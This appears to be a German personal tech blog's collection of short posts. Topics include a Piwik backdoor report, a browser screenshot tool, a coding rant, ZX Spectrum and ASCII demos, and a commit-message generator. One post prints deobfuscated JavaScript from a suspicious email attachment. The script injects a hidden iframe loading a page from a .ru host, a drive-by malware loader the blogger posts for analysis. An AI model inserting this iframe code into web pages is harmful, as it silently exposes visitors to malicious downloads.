Klick mich.

PS: Auch die Erstausgabe der CHIP gibt's für lau.

(Danke, Yen-Cee!)

Oha! Das Statistik-Tool Piwik hat eine fette Hintertür eingebaut!!

Wer Piwik in den vergangenen Wochen vom Server des Open-Source-Projekts geladen und installiert hat, sollte seine Server sofort überprüfen.

Der liebe Fronti hat mich auf ein Tool aufmerksam gemacht, das es für mich in Zukunft unnötig macht, den Schwarm zu bemühen wenn ich mal wieder am Layout rumfummle. Browsershots.org fertigt Screenshots einer Website mit Dutzenden verschiedenen Browsern an. Dabei kann man auch noch gezielt Java, JavaScript usw ein- und ausschalten. Sweet

Update: äh. Ich glaube, das Tool ist doch nicht so toll. Ich hab jetzt 2x versucht, Screenshots von todamax zu kriegen, und jedesmal kommme ich auf eine Ergebnisseite, die nach 14 Minuten inaktiv wird und mir erzählt, dass es noch 14-16 Minuten dauert, bis die Screenshots verfügbar sind. Das kanns ja wohl nicht sein

2. Update: wer lesen kann ist klar im Vorteil. Man muss die Seite hin und wieder reloaden, dann geht's doch!

[Update]: Danke! Ihr seid ein Spitzenpublikum und ich bin hinreichend optimistisch, dass die meisten von euch diese Seite so zu sehen bekommen, wie sich das gehört.[/Update]

Ihr könntet mir mal einen Gefallen tun. Macht doch bitte mal einen Screenshot von todamax, ladet ihn z.B. bei TinyPic hoch und packt mir den Link in die Kommentare. Schreibt vielleicht noch Betriebssystem und Browser dazu. Könnt ihr das machen? Bitte. Ich bin echt mal auf die Ergebnisse gespannt.

Danke.

Ich habe mal einen Anfang gemacht: (more…)

Kleine Plauderei aus dem beruflichen Nähkästchen eines leicht gefrusteten Coders. Normale Menschen klicken bitte weiter, hier gibt es nichts zu sehen.

In meiner Tätigkeit als Codemonkey kommen mir ja immer wieder befremdliche Dinge unter, die irgendwelche anderen Codeäffchen zusammengetippselt haben. Und manchmal reicht ein einzelner Facepalm nicht mehr aus, da der fail einfach zu epic ist. So auch heute, als ich über folgendes Lehrbuchbeispiel für Security by Obscurity gestoßen bin:

Aufgabenstellung: Der Anwender soll ein paar Daten in eine Tabelle klopfen, aus diesen Daten werden dann über einen Template-Mechanismus XML-Dateien erzeugt. Echt kein Hexenwerk. So sieht das aus:

Nun müssen also die eingebenen Daten irgendwie weiter gereicht werden, um von einer anderen Klasse verarbeitet zu werden.

Der Typ, der hier am Werk war, hat sich jetzt Dictionaries zusammengebaut, mit dem Attributnamen als Key. Soweit gehe ich d'accord. Anstatt nun aber ganz simpel die Werte als Strings abzulegen, hat der Typ Windows.System.Form.Textboxes genommen!! WTF? Und nicht genug damit! Nein, nein. Erst sammelt er sich nämlich die "Invarianten" und die "Varianten" Daten in 2 unterschiedlichen Dictionaries, nur um die dann mitten im Aufruf der verarbeitenden Methode zu einem einzigen Dictionary zusammen zu mergen. Das gibt dann sowas:

count = KLASSE.Do(actionName,
new Dictionary().Union(variantDataGridLinkedBox).ToDictionary(pair => pair.Key, pair => pair.Value).Union(invariantDataGridLinkedBox).ToDictionary(pair => pair.Key, pair => pair.Value));


Hö hö... höhöhö.... mwahahhaa... WAAAHAHAAAAA

Geht's bitte noch umständlicher? Klar! Er initialisiert sich nämlich diese Dictionaries vorher auch noch super hirnverbrannt mit diversen Loops, in denen er dann erstmal leere Textboxen erzeugt(!) um nachher was zu haben, wo er seine Daten dann reinschreiben kann! AUA!!!

Ich also alles rausgeworfen inklusive Initialisierungsfunktionen. Die Daten werden jetzt just-in-time eingesammelt, in ein einfaches Dictionary aus Strings gesteckt und der gleiche Aufruf sieht nachher so aus:

count = KLASSE.Do(actionName,dataToWrite);

ja, zugegeben, das sieht nicht so sophisticated aus. Aber ich kann danach wenigstens wieder ohne Knoten im Hirn ins Bett gehen.

Jetzt geht's ab! Ich habe gerade eine super obskure Mail erhalten, die als Attachment eine HTML-Seite mit ganz derbe enrcyptetem Javascript-Code enthielt.

Coderfreaks da draußen: hat eine/r von euch Zeit, Muße und ausreichend Expertise um mir zu verraten, was dieser Code macht?

Die komplette Mail gibt es hier als ZIP-File, der interessante JS-Code sieht so aus:

2. Update: Hier war nun der Code abgedruckt. Allerdings blocken manche Virenscanncer (z.B. AVAST) dann komplett den Zugriff auf mein Blog, deshalb musste ich den Code leider entfernen...

Disclaimer: ich hafte weder für Schäden noch für sonstige Unbill, die durch unsachgemäße Handhabung mit der Mail und/oder oben stehendem Code entstehen könnten. Der Code ist NICHT von mir, ich bin selbst nur ein potentielles Opfer. Noobs und Computerunversteher seien hiermit ausdrücklich gewarnt, mit dem Code herum zu experimentieren oder auf oben stehenden Link zu klicken.

1. Update: Hab selber Muße. Also. Der Code ist natürlich nicht wirklich encrypted sondern irgendwie bitgeshiftet oder was weiß denn ich wie das heißt. Lesbar wird daraus:

if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(""); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://gorysevera.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }

und ich will gar nicht wissen, was uns auf http://gorysevera.ru:8080/forum/showthread.php erwartet...

Ich schlage mich auf Arbeit gerade mit einer ziemlich fehlerhaften Installation eines extrem umfangreichen Programms herum. Dabei ging die Installation eines Windows-Services schief. Der versucht jetzt, eine EXE von einem Ort zu starten, die es dort gar nicht gibt. Ich würde also gerne den Pfad zu dieser EXE umbiegen.

Ganz einfach. In der Registry unter

den ImagePath anpassen.

(gefunden bei chitgoks)

Traumwerk von triebkraft und 4th Dimension

Moss meinte vor ein paar Tagen, er würde sich über eine Liste guter ZX Spectrum Demos freuen und da ich für meine 3 Leser und die eine -in bekanntlich alles tue, habe ich ihm und euch drei ander/inne/n ein paar Perlen aus dem Netz gefischt.

Hardcorenerds schauen sich die Demos (am Besten) auf einem echten ZX Spectrum oder einer Emulatorin an, die weniger computeraffine Leserschaft muss leider mit einem YouTube-Video Vorlieb nehmen. Sämtliche Links führen zu pouet.net, dem One-Shop-Non-Stop-Hoppitybop-Demo-über-Outlet mit dem Glöp.

Der Speccy ist mit seinen rasanten 3,5 MHz zwar satte 250% schneller als ein C64, wirkt aber durch seine total seltsamen Grafik-"fähigkeiten" (Stichwort: Colourclash) bei farbigen Animationen arg gehandicappt.

Wer überhaupt keine Vorstellung davon hat, wieviel Können und Trickserei in diesen Kunstwerken steckt mag vielleicht geneigt sein, die gezeigten Demos miteinander zu vergleichen. Davon möchte ich jedoch dringend abraten, denn die zeitliche Komponente spielt hier - wie überall - eine entscheidende Rolle. Im Laufe der Zeit wurden Demos immer ausgefeilter und wilder, vergleichbar etwa mit den Verbesserungen und Neuerungen beim Kinofilm. Metropolis sieht im Vergleich zu Matrix natürlich alt aus, dadurch wird seine Brillianz jedoch in keinster Weise geschmälert. Auch bei den Demos beeinfluss(t)en ältere Machwerke die neueren, habt bitte mit den Frühwerken ein wenig Nachsicht

Erschwerend kommt hinzu, dass die fiesen Russen bekanntlich nach den gemeinen Chinesen die Überpiraten schlechthin sind und so gibt es inzwischen diverse russische ZX Spectrum Klone, die zum Teil krass beschleunigt laufen und mit neuartigen Funktionalitäten glänzen und so jeden Originalspectrum Staub fressen lassen, was einen Vergleich selbst von Demos aus dem selben Jahr schwer macht. Als wäre das noch nicht genug sind Demos auf YouTube sowieso fürn Arsch, weil weder Framerate noch Auflösung zusammenpassen und MPEG die schönen cleanen Pixel meistens komplett vermatscht. Ihr seht, Computerkrams ist kompliziert und ich halt jetzt endlich die Klappe.

Wer gleich die volle Dröhnung will, hüpft nach dem ersten Video direkt runter zu 2011.

und wer mehr davon will, schaut sich mal diesen YT-Kanal an.

Mehr gibt's nach dem Klick: (more…)

Ich werde ab Mittwoch in den Genuss einer ASP.NET-Schulung kommen. Zu diesem Behufe wurde mir der Klotz "ASP.NET 4.0" von Dr. Holger Schwichtenberg ans Herz gelegt. Das liegt gerade auf meinem Schreibtisch und bringt mich zum Schmunzeln:

Hoffentlich ist der Inhalt nicht so meh

Kaum bin ich wieder da, erwischt mich schon 'ne Sommergrippe Trotzdem wollte ich mir diese wunderhübsche Nachricht ins Blog pappen: Studenten aus Texas ist es gelungen, einen Heli-Roboter, der eigentlich auf der Stelle fliegen sollte, durch Manipulation der GPS-Signale mehrfach vom "Kurs" abzulenken. Das macht mir Hoffnung.

Und jetzt wieder ab in die Heia.

Wer mal einen tieferen Einblick in die Programmierung eines 3D-Shooters bekommen will, kann sich dieses Codereview des Doom3-Source-Codes reinziehen.

Ich weiß nicht, ob ihr wisst, was eine Computerdemo ist. Das kann ich auch nur schwer erklären und die deutsche Wikipedia hat leider nichts Griffiges dazu parat. Audiovisuelle Echtzeit-Computerkunst trifft's wohl am Ehesten. Schaut euch mal das Video im Vollbild (!) an und versucht euch dabei zu vergegenwärtigen, dass ihr

a.) nur Buchstaben seht und
b.) alles was ihr seht in eben diesem Moment berechnet wird.

Damit habt ihr schon zwei wichtige Element von Demos kennengelernt nämlich, dass

a.) mit beschränkten Mitteln Dinge getan werden, die über die gesteckten Grenzen (scheinbar) hinausgehen und
b.) alles in Echtzeit berechnet wird

Eigentlich sind Erklärungen auch völlig unnötig. Genießt einfach die Show und wenn ihr Gefallen daran findet, schaut euch ruhig noch ein paar related Videos an. Für Kenner sag' ich jetzt noch Plasma, 3D-Engine, Dithering, Fraczoom und ASCII-Schnee. Yay

http://aa-project.sourceforge.net/

Three goals of AA-Project:

Port all important software (like Doom, Second Reality, X windows etc..) on AA-lib.
Port AA-lib on all available platforms (mainly ZX-Spectrum and Sharp).
Force IBM to start manufacturing MDA cards again.

ASCII-Art | demoscene

Das kapieren jetzt nur Coder, macht aber nichts. Ihr kennt das: zigmal am Tag sollt ihr euch sinnvolle Nachrichten für Eincheck-Vorgänge eures Versionierungstools ausdenken. Lesen tut das alles später eh keine Sau, ne? Genau! Und deshalb gibt es unter

jetzt einen Commit-Spruch-Generator, der euch die lästige Tippselei abnimmt

(\ /)
(O.o)
(> <) Bunny approves these changes.

(danke seilinho!)